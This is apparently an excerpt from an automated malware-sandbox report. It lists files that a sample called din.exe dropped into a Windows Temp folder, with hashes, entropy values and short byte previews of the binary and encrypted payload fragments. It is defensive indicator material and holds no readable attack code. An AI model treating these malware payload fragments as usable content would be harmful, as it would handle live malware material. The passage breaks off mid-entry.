                                                                                                                                                                                                                                                                                      SSDEEP:1536:En+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLg:E+AqVnBypIbv18mLthfhng
                                                                                                                                                                                                                                                                                      MD5:20B321CDCBBDDE96DBA00A2FBD8D5E19
                                                                                                                                                                                                                                                                                      SHA1:CFC520D14A265340A11DAABED5089B0098EC4C15
                                                                                                                                                                                                                                                                                      SHA-256:8A2872987492498E61CFD5AED3C742340D0952FF7F059496F068D1CB834EE085
                                                                                                                                                                                                                                                                                      SHA-512:F51492092486B66F4AFD5F6A1E895F4A97B81BFF30524094E30AF01BD98E042ADEAF1CF39C388C13D0FBB54E34FB7543458AC50D11DB0CBB4F39AF880A2B4028
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:3.N ...^..^..^..^..^..^..^..{....u..N4.p....E..FD..K..^H.NX.^L.^PP.^T.....E..M........D6M.@......9^8.D6M.................F0...t..NT.......t..NT.0..........u..NT....u..NT....t..............H....Mp.@....M`.8....MP.0....M<.(....M,. ....M........^[]..U..V.u.WV...Z....F4P.O4.N....Fh.Gh.Fl.Gl.Fp.Gp.Ft.Gt...._^]...U..V..h.....f...f...m8..Y.u............^]...U..U.f..f...B..A..B..A..B..A..B..A....B..A..B..A..B..A..B .A ...B$.A$.B(.A(.B,.A,.B0.A0....]...V........N.......N ......N0......N@......NP......N`.......^.VW...............`.I..............................................O|......Ol.....O\.....OD.GD..K..V....wH.7..Y.O4.....O _^....V..N`.|....NP.t....N@.l....N0.d....N .\....N..T.....^.L...U..V......K.......v...7...E..Yt.j.V..6..YY..^]...U..V..W..x....d...N...0.I...t..q8Q..e.....u..E..t.h....W.6..YY.._^]...V..W.>..t.......h....W.[6..YYj.V.Q6..YY_..^...U..SV..W3...N...t..V....R..X....u.M.S.#M.....M.9~.v).F.....p..0...P.OF...F.....M.....x.C;^.r._^[]...V..W3.9>t..6..`.I..>WWj.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Dumb

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):78848
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.995959875030467
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:v5el3EYrDWyu0uZo2+9BGmdATGODv7xvU:v5elDWy4ZNoGmROL7FU
                                                                                                                                                                                                                                                                                      MD5:C2A985269513E29FDF2CBBDA266EDAD2
                                                                                                                                                                                                                                                                                      SHA1:A83740B27B92C4209D5569939DCE12A1AF5EB40C
                                                                                                                                                                                                                                                                                      SHA-256:966D083F627920AB66704DE4EBF30D86F97DAB9E39376D2FFD52B2526531BEE3
                                                                                                                                                                                                                                                                                      SHA-512:503579285BDAB51F3652304C762C56647EEE59567BA7F34197121ED824946F801EE16304271C7892CD547C3912C20C1320873C0BE68C873F1673C7BAC0DA3303
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Durable

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):77824
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.691325670862485
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:VGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:8Kaj6iTcPAsAhxjgarB
                                                                                                                                                                                                                                                                                      MD5:BAFBC57F3FCA9279969C3A70BA3D398F
                                                                                                                                                                                                                                                                                      SHA1:5B47EDF11B275ED08F6D63C189D366428DC9B50D
                                                                                                                                                                                                                                                                                      SHA-256:FFBD3D0228613665949DA7051EDF3ADFEB9E603C10FE071C26FF42D3A95D1F98
                                                                                                                                                                                                                                                                                      SHA-512:1B0FAB4D2BAD4D3AFF7C542B712E306D1BF201B7D854B10310A12478C02269B71A7FE79E76AD5D5CC29F160D3FB7BF5B39D81E8E6A80746AB1173515850D5FA6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.r._._._._._._._._.`._._._._._._._._._._._._._._._._._._._._._._._._._._._._.a.a.r.r.r.r.b.b.b.b.b.c.c.c.c.c.c.c.r.r.r.r.r.r.r.r.r.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.r.r.r.e.e.e.e.e.e.e.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.f.r.r.g.g.g.g.g.g.g.g.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.h.r.r.r.r.r.i.i.i.i.i.i.i.i.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.j.r.r.r.r.r.r.r.k.k.k.k.r.r.r.r.r.r.r.r.r.r.r.r.l.l.l.l.l.l.l.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Gc

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):62464
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997532965210444
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:ao5EFDnXmQt2KPcnhFoxve3tEcu8KV8OS6y:ao+FDnNcnhqUtADSR
                                                                                                                                                                                                                                                                                      MD5:3D808EB22EF8125F2977E8C9DEE7CBF4
                                                                                                                                                                                                                                                                                      SHA1:801D525957B76E139EC278EE5DAF06E795DF06EC
                                                                                                                                                                                                                                                                                      SHA-256:D30DF2A6AF6CF7E41C9BDEDAA5F2EF26D8A5B60E083084BD346552B5FF9C8B67
                                                                                                                                                                                                                                                                                      SHA-512:1A60D81BED532E4EE588F24B67C52C8120B4497FF5BDA721F3966E37DCFB5C33DE5B05B4CC0325E41CD6E66849FF7597E4B621856CF8193F75E3F0DA329EA1D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:..b0O./....)..?......fU6G.~W..H#d[:F..$.3B.$.6.gm...y.6|..........Q.S..+.K|0.....EK..$.9..'..'.....b..0#M!...[......G[.,E....*.$....L..d.(].9.\}./h.SJ6j.....p#..~>Nh...#......g..2.-S.%...Hd.:lsA......z.+7..B.I.`.@P.xB.K...g.).D.g..><.l'.P&......3.1.m.8...s..Q....".5.....I.....LSn.Ie.^k.b*........n.{..S.~'....2nI..E..`.K...x..3.OE......[;..@..4>Q..3...0.V...eUX}.2.{..:.%..w..DMp...A.t.V.i.LA.....X.hPW."~.o....Faw>..D..CO.p..^...........Q.....a.H...Q.H..a..p......2p...[..m0uRi...D.#..s!........]...4(.^)S.+0...Z.t..y...O..$D..gZ..s..|'S./AG.{=...5n..>U.}D9.S...~..ZJ.p...ux^/.p.%...5.5..........#.c.=..c...N..^. .JILp.a...j...C2wb$.b.o..l.a.:P..a..../Cp.....D.0f9....wU...ISH.Y.;r...pe....)......}....;...0..9EuC.....4.D.,k..J^6D.R|C.*.4#n...T6K.xG......U..ND...0UZTYqx(.{.9.x......c.t..........................k..|Y..:`....!.G..a......Y.....0.._R1..m.....d6|.J..9.....C.L.?...7j..vJ8.....d.ek.b.M.....!}.yb.,..........N:.'..Y...;(..T..ZkE........

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Large

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):58368
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996979129201062
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:yPnAsgWrJifVjC+qlZ1Uw4B5ZVzVBi8qUv5krDsoZvJNVv1D:yPKWr8fVm+qlZB4fZRVDqok/RvbVZ
                                                                                                                                                                                                                                                                                      MD5:53303EE3BA975E2C0410A9FBD20C9021
                                                                                                                                                                                                                                                                                      SHA1:AB1DB0890BB3670673E81AE890A944946C889A82
                                                                                                                                                                                                                                                                                      SHA-256:6BA931FF62297ADEC1C996CC673572B10B908F617E4ECD9125AC83B9D8D68ACF
                                                                                                                                                                                                                                                                                      SHA-512:28ABFD2AB43A6764AEF7B1A64636000D61E95C3587DBE036E82CE7253DC1506680D33D83F3C752106F6FD1ED81B03405FDC1390A4BE7D9577EF110C0B67D23A8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:S...#.....n..(.....@o........$;.[.. q.OG...t.N....6....q.....<....z.E.w~...^f...~...U3.^dC...2L.o.V...e.........g._6...zV..f.....)..,.....e!..X...K......@S..C.C.m*....=F.a...V.t.'....n%.PY..q.....Am.t?Gx.\.6F.O..s..;.\.j_......6.*p.!.......`....UZ.X...X.=B.Q..n*R/R-...I/...Y....E...s....<:8.20...N..........t..%.L.K0u..(;z6......N.......]...t.G.sZ..|X..(...JK.t+u..o.(..z.3......1=.f%.:}..$V=./|.$.....U.x*.B|..M.........B3.K!..37...Ot..* _[`.-$J......*..r..%..t[..F.Yq. ...I.V....X....o.A....[h.bC....1....D....Z.........c.'....?.4yR..}....-...m...{;.I2..ME..#[`.?9....j....iO&...........gh}n....@-i...z.....Ee>8....|.......E.5..?.0..I.<0.....^.iz.R.\.....V.........^.$...."i........@...Z.y..|...v...z..`.Zks..b.c...h....=r.+.$.!.W...!$..%.H.:t.........0G->.~...J.t@.......OO.'F....lr......0.s..4.e.c..)>....~[ST.^.:y..5..O...L.^.......a..........{.......|.|..r.n...M.Q).s..+6Zqy...&.W'1e&.L4Q...\<X...r..tV.B.(..f.R.aw.s.~8.kP.....w`..Hn....HGJ.():D=.0..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Mice

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):102400
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.366406638646967
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:ZeoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8E:yO5bLezWWt/Dd314V14ZgP0T
                                                                                                                                                                                                                                                                                      MD5:C225DB9FEA424C533DF0E1DF700A2FDA
                                                                                                                                                                                                                                                                                      SHA1:C1E6D4E20885B6E40E5E9B5516421B5AD08FE56F
                                                                                                                                                                                                                                                                                      SHA-256:A98534A3B8DA106D513DCE08BC42A91E126916397FC2D7A972AA58E75F5C333E
                                                                                                                                                                                                                                                                                      SHA-512:7EA377E53D2097A35F652F1781A4E93036AD0A5304261463FFC47751C7D629A95FF2B819D8F30B88610A4D7E8F128034D618F423CCBF7DCFD5133A13E4C35F81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:t$..u..D$......F....x..u.....3..t$..D$.j..u.PP.[.....Q..|:...L:.t..I8.A..|:...D:.t..@8.L$..@...>.._3.^..]...U..E.....P.SVW.....y..t>.u....>..3.3.A...N....P..D:.8\:.t..@8.H..D:.8\:.t..@8.X.......x.........r.3.M.]..]..]...p...}..t..M...!...M.p...>...E......u.E..@....x..u.......E.P.E.P.E.P..Y...u...E...=...E...u3.F..........P..L:.8\:.t..I8.E..A..D:.8\:.t..@8.X....F........M..=...".y..u..9..3..u......s=...F......>_^3.[....U..E.VW.}...@.....x..t8.B=...'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.......p...=...G......7_3.^]...U.......S.].VW...K....x..t@.u.....<...&.3.A.N....P..|:...D:.t..@8.H..D:..|:..t..@8.@........L$...{..rW.I.j)......uI.g.........t$.y9.u....e<...&..F........H..|9...D9.t..@8.@......D9..|9...C..L$..d$...p...n...|$..t!.L$.......L$..p...<...D$......t$..C..P....x..u.....3..t$..D$.j..u.RP.X.....Q..|:...L:.t..I8.A..|:...D:.t..@8.L$..@...;.._^3.[..]...U..E..@....x..u....x..t.V.u....r;...&..F.....^3.]...U........E.SVW.@...3.\$..0...^....N..D$.P.T$...2..Y.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Mother

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):99328
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8265829918587535
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:VHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPa:VLeAg0Fuz08XvBNbjaAtsPa
                                                                                                                                                                                                                                                                                      MD5:FFB7BB96C2761809C529CD2701D39AA5
                                                                                                                                                                                                                                                                                      SHA1:4C137A6A047D23C9FB36AC5E7AC487D8445113F6
                                                                                                                                                                                                                                                                                      SHA-256:71DF34A0F80A981B2181C56613EC941B52F89148F07DAC146A428BCA77B19C36
                                                                                                                                                                                                                                                                                      SHA-512:D10EB51ED08D4E315ABF15C910A4F794A7D8B952A6B7BAD4A3B62E5242B727BD62205FB0D79CEA1042A59190C058F54F8A45E7E290EACD4CE7FB48754ED42551
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?.......?......@>..1|..MC......................8C......8C.\.3&..<.-DT.!.?.\.3&....-DT.!...\.3&..<.-DT.!.@........................................................UUUUUU.333333...m.m......?333333.?.q..q..?UUUUUU.?O..N..?.m.m.?$rxxx..?.......?.......................?.......?.........9..B..@...2b.........................7......8C......8C.\.3&..<.-DT.!.?........................................UUUUUU.?333333.?.m.m.?....?333333.?.q..q..?UUUUUU.?O..N..?.m.m.?$rxxx..?.......?.......................?.........9..B..@...2b.....................m0_$@...m0_$@......xC......8C.@DT.!.?..DT.!.?.@gg..2...LL#.F=J4.7.:Esp....:.3gg..2=.......?..............................`C.......<.......<.....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Pig

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):105472
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.642250428528698
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:7bi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHD:7bfSCOMVIPPL/sZ7HS3zH
                                                                                                                                                                                                                                                                                      MD5:F680055C3F355CBEFE689EEB454B288D
                                                                                                                                                                                                                                                                                      SHA1:6C8D045F3ED632D452F584AF5F22C7E99C2CEE5A
                                                                                                                                                                                                                                                                                      SHA-256:959F6959D96EB27E5201DC9521925786C24E4EFFAE051049057EF736C63E06CA
                                                                                                                                                                                                                                                                                      SHA-512:B95BD9CBFE18D7283A896FC325E78FAC5CC7EE9493D4682A3BE8A408C924AE08074D63D8B2A0000DBDA29E725F3958C2F5D7B3E7C36F08D1D53E5EC6BEDE5CFA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.u...............h....W.I...Y.E..E.Y..|.........r..........PVW.JF........tI.+.E...E.....|...u..u.W.....V.:......3.V.u..u.W....#......u..*......x......8.u.................V.8.....Y...Q;...|.;.s.V.u..u.W.C...#......t.W..>..YP....I...u....................0.I....3.[_^..]..U...,...L.3.E..E.SV.u..E.E..E.E..E.W.}..}...~"VW.....Y...E.Y.] ..~.SP....YY.......}.3..2......|.E$..u..E...@..E$..t.........;.u.j.X........~.3.@........~.j...M.QP....I...t...~/j.X9E.r.}...M.t.Q...t..:.r.:.........9.u...~5j.X9E.r..}...M.t..u.Q...t...:.r.:...~.....9.u..t...3.WWV.u.j..u$....I..E............J.;.....tY.J.;...#..J.=....w ;...#.......E................;...#.P.d!...E.Y..................E.....}.........u.PV.u..u$j.V....I.........WWS.u.j.V....I..E.............J.;.....tJ.J.;...#..J.=....w.;...#.........t`........;...#.P.. ....Y..tE...............t4.u.VS.u.j..u$....I...t..].WWW.u.V.u.S.u..u..G........].V....Y...].S.t...Y..e._^[.M.3.......]..U.....u..M..1...u$.E..u .u..u..u..u..u.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Prizes

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24779
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.258291776820648
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:kHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:sphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                                      MD5:3E942AAC4A2AE891334E575E5C56AF2D
                                                                                                                                                                                                                                                                                      SHA1:4B2C158F9A2B1FC3D2C17A4FF2ED9078EC15C7B0
                                                                                                                                                                                                                                                                                      SHA-256:AE3AB1F2DA012D59FF620AF33313879A0F1A2EBB2E6E4CA2B0FDE7E2D8917CAA
                                                                                                                                                                                                                                                                                      SHA-512:D7FF5F693B95433E9BCF6412A4B743703A79CC2FBD0F38052F9501B0A9832076CDD0F58DDEFE1D32229A5C3D83801E3FE27BE62521FD8C7BAC16C5857F0BD673
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:=.=.=.=.=9>O>[>~>.>.>.>.>.>.>.?'?2?X?.?.?.?.?...0.......0.060B0R0`0n0|0.0.0.0.1.1.1.2.2.2.2.2.2.2Z3.3.3.4.4/454B4p4.4.4.4.5.5#555@5O5c5v5.5.5.5.616<6V6i6q6|6.6.6.6.6.6.8.8)8F8n8.8.9.959B9J9]9.9.9.9.:.:.:I:.:.:b<k<.<.<.<.<.<.<.<.<.<#=9=D=v=|=.=.=.=.=.=.=.=.=.>.>#>/>H>j>.>K?\?.?.?.?...@..t...C0^0h0q0.0.0.0.1"171=1c1.1.1.1.2.4.5.505{5.5%6.7.7F7.7.7m:.:(;D;\;b;l;.;.;.;.;.;6<.<.=(=H>Q>t>.>5?E?J?c?n?.?.P.......0.0t0.0.0.0.0.0.0.0.0.1.1.1.1&1,121<1G1R1X1g1m1s1~1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2%2/252B2R2X2c2o2.2.2.2.3.3.3w5.5.5.6.7.7.9.:.:.:.<...`..8....0.0.0.0.141T112m3y3.345G5V5^5.5.5.:.:.;.=.=.=.>.p..(....0.0.1?1.535+6G6.9.9.95:B:J:.>......,....0.0.0.0.0.1r2.2.3.3.3.5.5.8a9]:.<......H....1.1.1.1Y2.2.2.2.3F3`3h3o3b;i;.;.;.;.;.;.;.<$<.<.<.<.<.>.>.>.>......@...70>0d0k0.3.3.3.3.6.6.6.7.7h8z8.8}:.:.:<=N=U=m>t>.>.?.?......T...|4=5J5R5.5.6.6.6.6.6.6I7X7`7.7.7.8.8.9.9(959=9D9.9.9.9.9.:.:.<(<0<.<.<.<.<@=....D...X4.9.:.:.:.;.;.;.;_<n<v<.=.=$=.=.=.=.=.>.>.>.?.?.?.?.?.?.?...... ....0.0.2.2.2.3.3!3/

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Rights

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):97280
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.997940121037945
                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                      SSDEEP:1536:aqQcJlHQaQXmPwCrh9URzIhk4yXNMExjNMcffHuVznwYYDZIjdOr2n81ywnAdeN6:aqQylwtXmoxsKfXNMExjDHSVFMrbDAd1
                                                                                                                                                                                                                                                                                      MD5:0B84E4CCF5043EC6EFD0A24E950203D0
                                                                                                                                                                                                                                                                                      SHA1:CE6DBAB2322539FE281F83AB280E93974E97ADE9
                                                                                                                                                                                                                                                                                      SHA-256:FBBA259A1854811DAE48F73DD71CB3807B19E3EC928D878A5CD5BE51B7E15212
                                                                                                                                                                                                                                                                                      SHA-512:7AF1898E75B28B3B6177602E4CEA635B5A84999E9155E1062E31EF65970B99D4BA3CBC2EB372BE077992FF401E2F4FF87D06411A0E5F587894CA813B1017783F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.w.}...Y&[..P.Bfg...v.U!..JK.....Pq.L<VQ.H..%....M.j.H......m.x*y.I'=.&D.e...~i.q...U.B......Xb..$_(.40v...].]... N.........'....Z.5.K=.*.l.gj...d....B,..7.|..X.ky...| .].i]]..%..8C._.Bn.YR......."K.D..z../....3."......R%Y...]iGY/.`..j.nv.....%.*....vE.B.YpAb]..KNS8`.{.>.g...b2f...gc.z.m..hI.~...{..p...(p,..?...........6...F.Nr...X.....?W..B.k.EV.n....>....?h...Y..^.r..)..M.5..$ ..=zQ..K....S...h..)2.*0S.e.7..z.1.4.?...A.Cu.P..N....bj...i.9^.7...G..u.&..j..%.=....$Apx..W*....k.uV.<..C.`......./.-...N.(.U..0vC$h.1..K....2..........5..%.0.....SU.......f..,g6.fR.k..-M.5U.....;...T..@Pi.x.,T.....UwM.C.L..>..)..r.8...F......8E.............X.Lou...NI[mR...%...!&._...'....R.K\.jQ.X=h..w.obu..a?he..{.r./.r........z|..D....w.O.1....J.....x....j........o..P..e_..]..JG....<Xwr.5.4.(..f..s..B..J.........S.u....0..r\..c_I..q..>!c.w....P;.j....J...R5.@f.....>...\.$~.........7c.t~tY....y....`...'z...>.....7..IW.vc.,.p......rR.#). .....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Teddy

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):136192
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.668150143905245
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:eBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESA:8NPj0nEo3tb2j6AUkB0CThp6A
                                                                                                                                                                                                                                                                                      MD5:35E8869B521CDB585A97F64215B52D70
                                                                                                                                                                                                                                                                                      SHA1:5D8E347CDE78992BFDAA094184BFCED2E3947C6A
                                                                                                                                                                                                                                                                                      SHA-256:0E6BB286391B6039559C88E04D69778E4C67D728EFD36DA241E19757109F6DF9
                                                                                                                                                                                                                                                                                      SHA-512:E2319728C825DC3802055716BC145BAB8A00095EEB8726B38F66991225ADBD7C6086252E8816385B7DA522254C8C260EA461A986F76CCD723BE8B894747708AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.B#...M.;E....#...B'f......E.H.y..C#...M.C)j.f...y.f.E.f...E.Y....yY.}...].t*......t"...........VPW.]...U.....j.Y...E.f......x.f.....E.f.....B!f......"..;E...."...}...].t%......t............VPW.5]...U.....f.....>.u..x..E.f.1...j.f..X..E..y.+E..E....j...........B%f..Y.Z".............SPW..\.....j.Y.S"...E........Pwnt)j.Y;.......j Y;.v.j)Y;.t...6t.jCY;........}......1L..E...H.M.tsf.A......f#.....f;.u].A....M..E...I...H.E..Fj][;.t.jm[;.v8jo[;.v.jpXf;.u)..E.".!.E.j.Y..@.f;.t.j.Yf;.t.j...j.X.E..M...+..........!.....jv^;.s....[L...t....f...].u.3..u(f...u..M.j.^.......E.......WP...P.t...U..N....j.X..E.jxf...K.Xf....f....E..U.f.H..u...!..3..E...E.t..}..u..M...M..j...j.Yf......#...E(.@`......[....E...@....B....U..E...........j.f..f#.....f;...O....u.f..^f.........;.....D...9U.t'.....;.v..................U....M.......M.f........f.......U.........F 3.+F..u......j<_.u.f9>.V.j>...E.K.U.X........j+Y.].f;.t#j-Yf;.t.j0Yf;.r.j9Yf;.v..E.E..o....~......f;.p...r!j.[j9Zf;.w........f;.p

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Traveller

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):152576
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.700242782297185
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:1UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4CE0IS:1UDtf0accB3gBmmLsiS+SAhCt
                                                                                                                                                                                                                                                                                      MD5:C656763EE2D44A6E12C2A5567611257A
                                                                                                                                                                                                                                                                                      SHA1:17AD80849922769EA786AD92AE07A69A9B7B12AC
                                                                                                                                                                                                                                                                                      SHA-256:D99F3184BC917C532670BC3A6900DE21BEF704FC426328DFA8BEB3DD3A4F9C65
                                                                                                                                                                                                                                                                                      SHA-512:6CE406F707D9543659A89A707214D2B9D197A9738B8DD50D082B3F32818DF2E512E79B5EF382221201998C5D17291F878E7B8338DDE5C8B8EB60BDDF96E491FE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:t;..U..2.....V..).....^.. .................w...3._^[..j..P....E..u.@P.F...U....SV...E....W..E.3..E.}.......0........f;...A......f;...5........f;...'......f;.......j.X3.B...............E..E.f..1w/f..0......f.........f.....p...f.."......3._^[..f..6t&f..8..O...f;E........E.....f;E.v..........+...U........^...M...M...E.SV...E.....3.].U..u.W...}..}.........M....... ......(.....K..,.....K..0.....K..4.....K..............U.j([%....f9..].E....................E................ ...............#.;.........j.Y%..p........M.3..8.....t......<.....H.....8.....8.....P......x.....l.....h.....X.....\.....T....U..U...|....U..d........`.........@...f9.t..@.Af9.u...O.U...D......w.U..E.E.8....E....f..8....E.P..(....U.PR.E..p...P.E.L...P.E..].P.E.PRRRR.E.P.E.P.U..7....u..4.........}.............\......X....E..4E8...V.......Y.........s.3...ERCP.E..C..E..C..E.C..E.C.3..C.j.Xf.C"f..\...f.C$f..X...f.C&3..C(.C,.s0.s4..h.....l....u..u...h.....p.....C"..C..T.....C&..K$....8.....H..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\b37b67dd-50df-4c4c-b8b6-85db85a7688d.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
